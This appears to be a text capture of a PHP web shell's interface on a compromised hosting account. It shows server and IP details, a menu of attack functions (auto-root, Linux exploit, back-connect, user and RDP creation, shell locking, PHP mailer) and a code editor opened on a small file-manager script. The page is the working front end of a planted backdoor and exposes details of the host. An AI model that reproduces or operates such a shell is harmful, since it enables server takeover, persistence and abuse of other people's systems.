Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
filecontainer /
[ HOME SHELL ]
Name
Size
Permission
Action
lchg-fichiers.php
760
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lchg-fichiers.php
<?php include_once('filemanager/class/FileManager.php'); ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>File Manager</title> </head> <body class="fmBody"> <?php print "\nrootdir = ".$rootDir; ?> <table border="0" style="width:100%; height:100%"><tr> <td align="center"> <?php $FileManager = new FileManager(); $class_vars = get_class_vars(get_class($FileManager)); foreach ($class_vars as $name => $value) { print "\n".$name." : ".$value; } /* $FileManager->rootDir = '/filecontainer/lchg/'; */ $FileManager->create(); $class_vars = get_class_vars(get_class($FileManager)); foreach ($class_vars as $name => $value) { echo "\n"."$name : $value"; } ?> </td> </tr></table> </body>
Close